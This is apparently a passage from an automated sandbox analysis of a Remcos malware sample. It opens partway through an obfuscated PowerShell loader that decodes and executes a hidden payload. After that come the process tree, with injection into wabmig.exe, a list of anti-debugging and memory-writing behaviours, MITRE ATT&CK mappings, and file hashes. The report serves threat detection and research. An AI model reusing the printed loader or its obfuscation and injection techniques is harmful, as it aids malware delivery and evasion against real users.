uilAftrkeColorr KongeFrkkesOpula. AphtDHaiveo Hyo wT.temnafgudlKejseo,ivska SldedLevogF PentiWrithlUn ere Unde( atab$StortMDuopooJulian,uskioBigaepskvadoVoldtlOvertiImpelsOsmane Aut raut,cep nsatClutt,Har.o$UlotrPUdtr,a Percs Van sSe,boafaceln KrlitSadomeTi wirUbev n.ilkle UnthsF rba)Clois ';$Passanternes=$Fixup[0];Graenseprovins (Ferulaceous15 'Halle$DvnldgTherml RundoRustib O ttATerapl Afgr:LemonHPtyalAGunsmAUl,lifHubsssUnexp=preli(Buc eT BanceH,abasTakletSize - i,dePTiffaa Epo,T Kon hAchil Forkr$Mis,epThor a Sk rS SymbSBlodfA.ecimNSupratBemaeEOversr SubwnMoo nE EnersG,uss) stri ');while (!$Haafs) {Graenseprovins (Ferulaceous15 ' Tils$TilregDrueslSa rio DybsbB.lsaaPsoralCanth:pseudP Bom rPrereeGenbrq TilduSe,ime peralB.gen= Hy o$Danget Chagr Co.duTil aeUr nv ') ;Graenseprovins $Unassassinated;Graenseprovins (Ferulaceous15 'HanebSYndl tTarata Fri rCorditMow d-ForudSSylvil Gge ePa.rie .mbep kse Paren4U son ');Graenseprovins (Ferulaceous15 ' Thor$OpaqugHa idl F,ulorsonnbBuketaHabillDebat:SprinHTi rgaGa ldaAa skf Regis Ekss=Mirak( poteTKonfieFors sIdematUnfri-ReenlPL eseaGurnetK mpkhPaxiu Accol$Inv lPA lisaE,bles OrbisHygroa Udt nDel ntUdfrde U rer eaksnsmagse RespsUnder)Or.de ') ;Graenseprovins (Ferulaceous15 ' Bide$Dob egIn ralAttrao Bleab SydvaBrummlSpiny: UltrC Mot.o Strir,narerStutteT otssPatinp CabroAd umn loakdfourre tonnPrinctP efusSlatihSamariD gerpGenet=Reli $SytilgTaarnlStoicoSpattbDecena Skutl Lor.:DebugPL ncaoOverelLevesyP.akkiR ndedRasurrFur aoUnimps U,diiBia,rs N ss+Sempe+Anako%tufta$ConcoANdbref A prt Indhrd nceyYpur kFlo inSideripokalnMetacg Soris soft.NykalcTroggoAfhrdu ruen P.eftDdema ') ;$Monopoliseret=$Aftryknings[$Correspondentship];}$Strafferegistrenes239=332230;$Hundehvalpene=29477;Graenseprovins (Ferulaceous15 ' und$KonkugMa.lolVirksoPapilbN,geraPolyhlB.neg:UvsencEnormaAgenduLimstd paleaSt mmeBlomk Aztec=Doll oversGPlen e VisntTusin-BradyCIndskoCurumnSp totBenzyeTronanAffaltHeau, Hofso$RntgePP eria HorisSagres ndera ScrunRarert RrbleRealirGi,penD ooleDownhsstudi ');Graenseprovins (Ferulaceous15 ' olon$ Kistgstavrlt enso OverbDaugha ScaflTawny:dubleTNoveliSkolelUdtrksc,ppetM gilr,ygosa Ber.nTid tspedompsaturo ComprC nchtfund eSkader Grooe ElecdPyreneAssev eko=gui.e Frugt[ShlumSBlindyDreams Prect CotteSupvrm Pare.TransCStipeovid,rn BetjvImpereTabitrTe sttB wal]terri:Isbjr:.onpaFglacirGuachodi tomBur eB ,orda MurbsUspileTauto6Anti.4SisseSu,bectPam.hrMov eiln denAdamsgUrino(Udsm,$Sectic ForsaOlieruStil dSa loaGrayceCappu)T,pab ');Graenseprovins (Ferulaceous15 'S.uds$Portrgunclel JudooAntipbBran.au ragl oble: M,slNT gstoBro.bn DictrI.tegess.nmtLak fiZafferUdstuePrognmUn.lueS vtanDictrtSyste Komp=Polye .hsde[klub S EtioyBordksYdendtStigbeDatasmUdgiv.Arro.T d ngeFravrx Rob.tPum e.FrnutEAutisnN,urocAno ooPh.red atoviGyl,enTrafigPeakk]Canke:misso:bl mmAMenupSOver CsituaINereiIbedri. EvanGVarmheKlosetPotteSFoliet CamorAndroiD natn Sporg nond(Fiske$AsleeT AfriiIn,erlNecrosHek,etFrugtr.paalaReturnClimas c sppG soloA tegrravnetTelefe GaterKosteeFo madAtamaeSkden)Oprre ');Graenseprovins (Ferulaceous15 'Tuj.e$PhagogSubselUdv,do besobUndera MccalKarto: porSPaatrtSvaleoNikanvNonintnight=di,co$AntihNOpby oAr,ejn s rerE soreMarketSisteiLuigirDe bieRuttemGgegue CottnRiskrtRecus.OwrehsAkkomuVar ibEmi asPre,atridserDecori.olitnOverdgOutwo(Prior$pastrSArubatRusserSfreraAnticfSjlegfRo,ane ChanrYokere Pigwg ,edkifupmasAnalot TillrS dwaeRavnenNondeeUgen sElekt2 Tote3overu9,ilow,Humfr$galerHSkriduBidi nphiltdRivebeAfdelhUntinvKbstaaUlfhilant,qp,ynthedagsonEstiveo kal)Lo ke ');Graenseprovins $Stovt;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:740
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Microchip1.Ana && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:644
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1652

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
c3d25c58eace2803b2745eb6f1fb5559

SHA1
843cef2ac1810c71e6a19dfa6a2e4cebcc0c596a

SHA256
8243ca7540641b2ed9f27c5fabfc4160f695096ca4b59c9879e050f2c8ed56dd

SHA512
bab13810434815b3911f04f3d5d673c8ec1a47588b2fe45d09082dd24f83deec3e6aaccd73ed96db9339e1010685382aea8b67414d66ca0d4ea8c362300c2a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_stfsdi1v.cyp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microchip1.Ana

Filesize
470KB

MD5
dc8b20ecb669b12cb2d377e69425b1ae

SHA1
7f95a7e40871adbc900378d69125f01672b99484

SHA256
efb89bbdef46898ebbb533b069a851427aef1b99983e3156e9b88e4a846828b3

SHA512
b9706209f6b21907e9bbc784638877f612674926b12cb2a73bdc0ad50ae93a2dc4e358c5bf524729732afd9798d13aebdcdaa5e424d785819c4cbff9b3ada141

Download Submit
memory/740-26-0x0000000005150000-0x00000000051B6000-memory.dmp

Filesize
408KB

Download
memory/740-24-0x0000000004FD0000-0x0000000004FF2000-memory.dmp

Filesize
136KB

Download
memory/740-46-0x00000000088F0000-0x000000000B6FB000-memory.dmp

Filesize
46.0MB

Download
memory/740-41-0x0000000006450000-0x000000000646A000-memory.dmp

Filesize
104KB

Download
memory/740-44-0x0000000008340000-0x00000000088E4000-memory.dmp

Filesize
5.6MB

Download
memory/740-22-0x00000000026E0000-0x0000000002716000-memory.dmp

Filesize
216KB

Download
memory/740-23-0x00000000053D0000-0x00000000059F8000-memory.dmp

Filesize
6.2MB

Download
memory/740-40-0x0000000007710000-0x0000000007D8A000-memory.dmp

Filesize
6.5MB

Download
memory/740-25-0x0000000005070000-0x00000000050D6000-memory.dmp

Filesize
408KB

Download
memory/740-42-0x0000000007150000-0x00000000071E6000-memory.dmp

Filesize
600KB

Download
memory/740-36-0x0000000005A00000-0x0000000005D54000-memory.dmp

Filesize
3.3MB

Download
memory/740-43-0x00000000070E0000-0x0000000007102000-memory.dmp

Filesize
136KB

Download
memory/740-38-0x0000000005EC0000-0x0000000005EDE000-memory.dmp

Filesize
120KB

Download
memory/740-39-0x0000000005EF0000-0x0000000005F3C000-memory.dmp

Filesize
304KB

Download
memory/1652-48-0x00000000022A0000-0x00000000050AB000-memory.dmp

Filesize
46.0MB

Download
memory/1652-62-0x00000000022A0000-0x00000000050AB000-memory.dmp

Filesize
46.0MB

Download
memory/1980-21-0x00007FFD763A0000-0x00007FFD76E61000-memory.dmp

Filesize
10.8MB

Download
memory/1980-37-0x00007FFD763A0000-0x00007FFD76E61000-memory.dmp

Filesize
10.8MB

Download
memory/1980-4-0x00007FFD763A3000-0x00007FFD763A5000-memory.dmp

Filesize
8KB

Download
memory/1980-19-0x00007FFD763A0000-0x00007FFD76E61000-memory.dmp

Filesize
10.8MB

Download
memory/1980-18-0x00007FFD763A3000-0x00007FFD763A5000-memory.dmp

Filesize
8KB

Download
memory/1980-47-0x00007FFD763A0000-0x00007FFD76E61000-memory.dmp

Filesize
10.8MB

Download
memory/1980-16-0x00007FFD763A0000-0x00007FFD76E61000-memory.dmp

Filesize
10.8MB

Download
memory/1980-65-0x00007FFD763A0000-0x00007FFD76E61000-memory.dmp

Filesize
10.8MB

Download
memory/1980-15-0x00007FFD763A0000-0x00007FFD76E61000-memory.dmp

Filesize
10.8MB

Download
memory/1980-10-0x0000021CA77D0000-0x0000021CA77F2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing